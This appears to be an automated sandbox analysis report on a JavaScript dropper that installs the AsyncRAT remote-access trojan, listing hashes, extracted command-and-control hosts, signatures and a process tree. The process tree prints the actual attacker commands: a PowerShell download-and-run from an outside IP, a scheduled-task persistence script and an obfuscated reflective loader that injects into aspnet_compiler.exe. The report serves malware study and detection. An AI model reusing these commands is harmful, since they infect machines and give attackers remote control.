Analysis
-
max time kernel
147s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
07-12-2023 07:39
Static task
static1
Behavioral task
behavioral1
Sample
fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
Resource
win7-20231023-en
General
-
Target
fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
-
Size
7KB
-
MD5
b2195fa1ea604007f7a3664e0e49f591
-
SHA1
915985302f8fb7f37d07d22a8ec5cb5e8005fb47
-
SHA256
8550509a02f745f281a2a87c1f336b0fca32bd51c1074b281e5772e5c8a6ff60
-
SHA512
478d9dcd9391a2e224bd291325dde58883d197d4cec1d989a3f054363dc03e19075e174058db828fbfc668cb76e2cd2b73782bbad3cd6a582383a62d37a8b977
-
SSDEEP
96:xBdMQYYVlVS+RwbkiEi3gkFmRePXywbkOEi3ckFmRePXuUxBbLDIX3FU3i:qQYYXVS+R9SgbEPihScbEP+cBb+3FGi
Malware Config
Extracted
http://23.145.120.49:249/js.jpg
Extracted
https://nodejs.org/download/release/v6.17.1/win-x64/node.exe
Extracted
asyncrat
AWS | 3Losh
Js
wpmediatech.com:6606
wpmediatech.com:7707
wpmediatech.com:8808
AsyncMutex_aloshx
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect ZGRat V1 1 IoCs
Processes:
resource yara_rule behavioral2/memory/396-115-0x0000025FDB930000-0x0000025FDB988000-memory.dmp family_zgrat_v1 -
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4904-116-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exeWScript.execmd.exeWScript.exeWScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process target process PID 396 set thread context of 4904 396 powershell.exe aspnet_compiler.exe PID 5068 set thread context of 3580 5068 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000_Classes\Local Settings cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
powershell.exepowershell.exenode.exenode.exepowershell.exepowershell.exeaspnet_compiler.exenode.exepowershell.exepid process 1980 powershell.exe 1980 powershell.exe 3552 powershell.exe 3552 powershell.exe 3552 powershell.exe 4400 node.exe 4400 node.exe 1072 node.exe 1072 node.exe 1876 powershell.exe 1876 powershell.exe 396 powershell.exe 396 powershell.exe 1876 powershell.exe 396 powershell.exe 4904 aspnet_compiler.exe 4904 aspnet_compiler.exe 1972 node.exe 1972 node.exe 5068 powershell.exe 5068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeaspnet_compiler.exepowershell.exedescription pid process Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeDebugPrivilege 1876 powershell.exe Token: SeDebugPrivilege 396 powershell.exe Token: SeDebugPrivilege 4904 aspnet_compiler.exe Token: SeDebugPrivilege 5068 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 4904 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 50 IoCs
Processes:
wscript.exepowershell.exeWScript.exemousocoreworker.execmd.exeWScript.exeWScript.exenode.execmd.exenode.execmd.exepowershell.exeWScript.exenode.execmd.exepowershell.exedescription pid process target process PID 5112 wrote to memory of 1980 5112 wscript.exe powershell.exe PID 5112 wrote to memory of 1980 5112 wscript.exe powershell.exe PID 1980 wrote to memory of 1184 1980 powershell.exe WScript.exe PID 1980 wrote to memory of 1184 1980 powershell.exe WScript.exe PID 1184 wrote to memory of 4300 1184 WScript.exe mousocoreworker.exe PID 1184 wrote to memory of 4300 1184 WScript.exe mousocoreworker.exe PID 4300 wrote to memory of 4964 4300 mousocoreworker.exe net1.exe PID 4300 wrote to memory of 4964 4300 mousocoreworker.exe net1.exe PID 1184 wrote to memory of 2008 1184 WScript.exe cmd.exe PID 1184 wrote to memory of 2008 1184 WScript.exe cmd.exe PID 2008 wrote to memory of 3552 2008 cmd.exe powershell.exe PID 2008 wrote to memory of 3552 2008 cmd.exe powershell.exe PID 2008 wrote to memory of 2472 2008 cmd.exe WScript.exe PID 2008 wrote to memory of 2472 2008 cmd.exe WScript.exe PID 2008 wrote to memory of 4352 2008 cmd.exe WScript.exe PID 2008 wrote to memory of 4352 2008 cmd.exe WScript.exe PID 2472 wrote to memory of 4400 2472 WScript.exe node.exe PID 2472 wrote to memory of 4400 2472 WScript.exe node.exe PID 4352 wrote to memory of 1072 4352 WScript.exe node.exe PID 4352 wrote to memory of 1072 4352 WScript.exe node.exe PID 4400 wrote to memory of 4384 4400 node.exe cmd.exe PID 4400 wrote to memory of 4384 4400 node.exe cmd.exe PID 4384 wrote to memory of 1876 4384 cmd.exe powershell.exe PID 4384 wrote to memory of 1876 4384 cmd.exe powershell.exe PID 1072 wrote to memory of 4720 1072 node.exe cmd.exe PID 1072 wrote to memory of 4720 1072 node.exe cmd.exe PID 4720 wrote to memory of 396 4720 cmd.exe powershell.exe PID 4720 wrote to memory of 396 4720 cmd.exe powershell.exe PID 396 wrote to memory of 4904 396 powershell.exe aspnet_compiler.exe PID 396 wrote to memory of 4904 396 powershell.exe aspnet_compiler.exe PID 396 wrote to memory of 4904 396 powershell.exe aspnet_compiler.exe PID 396 wrote to memory of 4904 396 powershell.exe aspnet_compiler.exe PID 396 wrote to memory of 4904 396 powershell.exe aspnet_compiler.exe PID 396 wrote to memory of 4904 396 powershell.exe aspnet_compiler.exe PID 396 wrote to memory of 4904 396 powershell.exe aspnet_compiler.exe PID 396 wrote to memory of 4904 396 powershell.exe aspnet_compiler.exe PID 3340 wrote to memory of 1972 3340 WScript.exe node.exe PID 3340 wrote to memory of 1972 3340 WScript.exe node.exe PID 1972 wrote to memory of 1224 1972 node.exe cmd.exe PID 1972 wrote to memory of 1224 1972 node.exe cmd.exe PID 1224 wrote to memory of 5068 1224 cmd.exe powershell.exe PID 1224 wrote to memory of 5068 1224 cmd.exe powershell.exe PID 5068 wrote to memory of 3580 5068 powershell.exe aspnet_compiler.exe PID 5068 wrote to memory of 3580 5068 powershell.exe aspnet_compiler.exe PID 5068 wrote to memory of 3580 5068 powershell.exe aspnet_compiler.exe PID 5068 wrote to memory of 3580 5068 powershell.exe aspnet_compiler.exe PID 5068 wrote to memory of 3580 5068 powershell.exe aspnet_compiler.exe PID 5068 wrote to memory of 3580 5068 powershell.exe aspnet_compiler.exe PID 5068 wrote to memory of 3580 5068 powershell.exe aspnet_compiler.exe PID 5068 wrote to memory of 3580 5068 powershell.exe aspnet_compiler.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.145.120.49:249/js.jpg' -Destination 'C:\Users\Public\zip.zip'; Expand-Archive -Path 'C:\Users\Public\zip.zip' -DestinationPath 'C:\Users\Public\' -Force;Remove-Item C:\Users\Public\zip.zip; C:\Users\Public\brave.vbs2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\brave.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" session4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\node.exe"C:\Users\Public\node.exe" C:\Users\Public\install.js6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /s /c "powershell.exe -c $tr = New-Object -ComObject Schedule.Service;$tr.Connect();$ta = $tr.NewTask(0);$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes';$ta.Settings.Enabled = $true;$ta.Settings.DisallowStartIfOnBatteries = $false;$st = $ta.Triggers.Create(1);$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss');$st.Repetition.Interval = 'PT2M';$md = $ta.Actions.Create(0);$md.Path = 'C:\Users\Public\app.js';$ns = $tr.GetFolder('\');$ns.RegisterTaskDefinition('Media', $ta, 6, $null, $null, 3);"7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c $tr = New-Object -ComObject Schedule.Service;$tr.Connect();$ta = $tr.NewTask(0);$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes';$ta.Settings.Enabled = $true;$ta.Settings.DisallowStartIfOnBatteries = $false;$st = $ta.Triggers.Create(1);$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss');$st.Repetition.Interval = 'PT2M';$md = $ta.Actions.Create(0);$md.Path = 'C:\Users\Public\app.js';$ns = $tr.GetFolder('\');$ns.RegisterTaskDefinition('Media', $ta, 6, $null, $null, 3);8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\node.exe"C:\Users\Public\node.exe" C:\Users\Public\run.js6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));""7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));"8⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\app.js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\node.exe"C:\Users\Public\node.exe" C:\Users\Public\run.js2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5e5ab5d093e49058a43f45f317b401e68
SHA1120da069a87aa9507d2b66c07e368753d3061c2d
SHA2564ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74
SHA512d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58c93b50b44099e1b2aacccdd85970e14
SHA1c4a546dbbcb21968583e7bcdf9ea9501ee3a0bb0
SHA256802f6ffb46b82605ade11351529d38526db573e5e71858be5bc435db75b13f48
SHA5121e13e0e06029c8a705dc1ad1b2dd75e31a237611fc4e82423e78bd35ca0bdaa2751e64209ef68e9c6672ea618184f21c541b7547395f8f2c25d91d61247937ee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD599b64d4346b7109a0b6bdb39b35fad4a
SHA116661afa04651c5e165904b61bdee5ffa37991d2
SHA2564058e21da225dadf3f5ce6008dab2d9d3d997ef486963becdc53373739724966
SHA512c749b12fa8d3c49833c7c270ff5437dd038eaa6f4165911583c0d08d5f4ba66696deae14f8642ee95c6420728f0db804e7283871d819e7f88eb8c0fda18ff289
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD599b64d4346b7109a0b6bdb39b35fad4a
SHA116661afa04651c5e165904b61bdee5ffa37991d2
SHA2564058e21da225dadf3f5ce6008dab2d9d3d997ef486963becdc53373739724966
SHA512c749b12fa8d3c49833c7c270ff5437dd038eaa6f4165911583c0d08d5f4ba66696deae14f8642ee95c6420728f0db804e7283871d819e7f88eb8c0fda18ff289
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
2KB
MD55b54aabc7de5d1ccf5faaffecc7325cf
SHA1a07058a401b98ec3a0b55d9433157483dc63a541
SHA256500e1f463566679c304dce99d144cac756773bcc786238fbe3855657fbee8170
SHA51246f97e48aca52836f71e7b6b680d58484e750b12d49a8eb06fb9768adec8049dac2024514e187b9bb2aec57c1fd32239e8644c1683f1bb625886d0d15382a5ac
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4frmulpz.bzb.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\Execute.dllFilesize
56B
MD5529cf04db0f736467c7583ea80c3aa66
SHA17628148337b1d3d700c8151f76a1595b6f5123b8
SHA25667642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520
SHA512f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4
-
C:\Users\Public\Framework.dllFilesize
520B
MD56a08392ecf95df7fc91917dcfaae8da6
SHA1480f6a5c761e1a069c0d68f5ac2aabf727791393
SHA2560a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460
SHA512d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e
-
C:\Users\Public\app.jsFilesize
353B
MD5a307c4557d5fdf209e1b38a803e03b52
SHA114e00c86caadf2ed0949dc7a3f6bffbb5b9cd0fa
SHA2563a16f15174757a5f84ae743db042b62b2554620118de63be2e7086827f114bf5
SHA5122c6ad68b4bfe3cd0260712da43a48f1e9b0d60d555be80560a892fb21617061f4efa02c3bb078fb0f02fdd432c48afb88e5f5ec9a05fb82124face2a27a3ac66
-
C:\Users\Public\brave.vbsFilesize
2KB
MD58c2bd49f41e4a825fc7f030bb38143f6
SHA1290b7da6cdd513b6d06deca81c288fa6f8a92b1f
SHA2562b58d54f0620f94e37f97ef5d4281b9ba50e171fd542967f22a3053096315b03
SHA5121d6dcbf178c4ed4f60e99b8555f2c420e550e1bb91777a4ce1f01ce2d801d964ced6ff0ca74972370b150f31d63624788380448732b50ce9ec7e58c64c3aa17d
-
C:\Users\Public\install.jsFilesize
796B
MD55727e0cb34eac044ea5495b99b7a2f8c
SHA16b99de1c9f92718e0053645c2e597d745f23ae34
SHA256633dc94e7d8e997438a21ac12d05ef1614f7ef8b3df815ea19041880dd0ad8d9
SHA512300fa4ce3943279b7eff9dd844e8713a1d3a414f6217d881158181440bb187f16715fc494134dc584c826ead713a8d8f9a0f4ff1e17b2b37aef09e88c5ea603b
-
C:\Users\Public\invoke.dllFilesize
6B
MD5b9376e9e3c4d48f5e35a3f355ae1f74a
SHA1c65605adf5270f5065089b0189da542274d30db0
SHA25690092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9
SHA5125560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591
-
C:\Users\Public\load.dllFilesize
4B
MD5f19dbf2edb3a0bd74b0524d960ff21eb
SHA1ddcb77ff769ea54ca622848f6bedd4004fa4f4fa
SHA2568a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3
SHA512f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216
-
C:\Users\Public\method.dllFilesize
9B
MD538b97710070dbdd7b3359c0d52da4a72
SHA14ce08d2147c514f9c8e1f83d384369ec8986bc3b
SHA256675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7
SHA512b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c
-
C:\Users\Public\msg.dllFilesize
129KB
MD56582381682a8618da150ce6c3de6a227
SHA10f34186a7fc3519005dcc369aab22a109ba8f2da
SHA256b1805c2c47cb2734111e8b03b3e305de22c4c3149fb3dff96c869df59d806e9e
SHA512338b76b56fb4aa89d485f1519942fd1ab09facd5f6e06d92c1038bc53cfc389514b98065ad5ded74c1eada98d0950f218d17bab0ca2b0d4cb1ece71c9b467bdc
-
C:\Users\Public\node.batFilesize
604B
MD548e50f8d07d71b99772fcaff006ff53e
SHA1ae7caa69a56d643466003567d1560ca369bcec37
SHA256360eb0a4b12c48059e0b58994bf42d9525a6cba97f6b8f4dc70fbbcfa4792957
SHA5121a6fb38519a7181c20fd2465945e8dd01057ad8a223362fa8af73f91e7a079ca34ca9b76787d92ba733f02ea795a8cddacc93e33af32fe8f51a548bdec5e2438
-
C:\Users\Public\run.jsFilesize
8KB
MD59840c805e56a4b32437e7985520eda6c
SHA1360d4fdc697375269b509304cb8f3ffa52df524a
SHA256ae5af88d556975ffb39af6c7d12da330de39a7eaaf65f6fd9c9414253e0f5334
SHA51201f7d8ecb5c7d516763825c071aeb9ca786bcd686765cfb789df23a26c6b914dec259fa03a1ab190fb33a0af3e35b4c7afe11c8e9cf0d469818bdf331f6c3d67
-
C:\Users\Public\runpe.dllFilesize
656KB
MD53afb403063fe1faf571332a4afcf238c
SHA17db1273349ddc765ccaa15c97148a849d3a300f8
SHA25666980cc688f22905fcb2d034bec4777d71f8fdd30beceb4dac7a71bf7f6abeed
SHA51250d975edec1ca36d817371e6dbe3e4020537d4c86076c1ba2cfd434c0bf136d0004a44bd3182a79a80bfb1da2c6eae20e5aecd1a22a6c220bb4dd76755e1ef8a
-
C:\Users\Public\shell.jsFilesize
182B
MD5d71e2d55ee0534b06313f71aefd921b9
SHA16c7713299bdcb1cc4046b7612775c24ddf68ad82
SHA25643bdd5e0b846271a4bae3a4f74c8310b914497abd2ffe0e1886ec9fec9f25ecd
SHA5126e5f222fa12d4dad713d5e8dd6a443d09ba5f715fa8701b5b26edf0f1ae8204d65eb560b003dfbc5b2f240079dc2c4eb06b9c2245de24338fa9a5c80647eb536
-
C:\Users\Public\type.dllFilesize
7B
MD5be784e48d0174367297b636456c7bcf1
SHA18c906d9e0e2439238b3263e087aee3d98fa86dea
SHA256510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136
SHA512aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4
-
C:\Users\Public\xx.dllFilesize
72B
MD514c2a6b7bf15e15d8dae9cd4a56432d5
SHA10d00aa5d547ea7e6f7283221e5f3b0cc91cc6016
SHA25679891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96
SHA512e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/396-120-0x00007FFB7E6F0000-0x00007FFB7F1B1000-memory.dmpFilesize
10.8MB
-
memory/396-96-0x00007FFB7E6F0000-0x00007FFB7F1B1000-memory.dmpFilesize
10.8MB
-
memory/396-97-0x0000025FD9510000-0x0000025FD9520000-memory.dmpFilesize
64KB
-
memory/396-115-0x0000025FDB930000-0x0000025FDB988000-memory.dmpFilesize
352KB
-
memory/396-98-0x0000025FD9510000-0x0000025FD9520000-memory.dmpFilesize
64KB
-
memory/396-101-0x0000025FD9510000-0x0000025FD9520000-memory.dmpFilesize
64KB
-
memory/1876-86-0x000001DDFA790000-0x000001DDFA7A0000-memory.dmpFilesize
64KB
-
memory/1876-113-0x00007FFB7E6F0000-0x00007FFB7F1B1000-memory.dmpFilesize
10.8MB
-
memory/1876-76-0x00007FFB7E6F0000-0x00007FFB7F1B1000-memory.dmpFilesize
10.8MB
-
memory/1876-99-0x000001DDFA790000-0x000001DDFA7A0000-memory.dmpFilesize
64KB
-
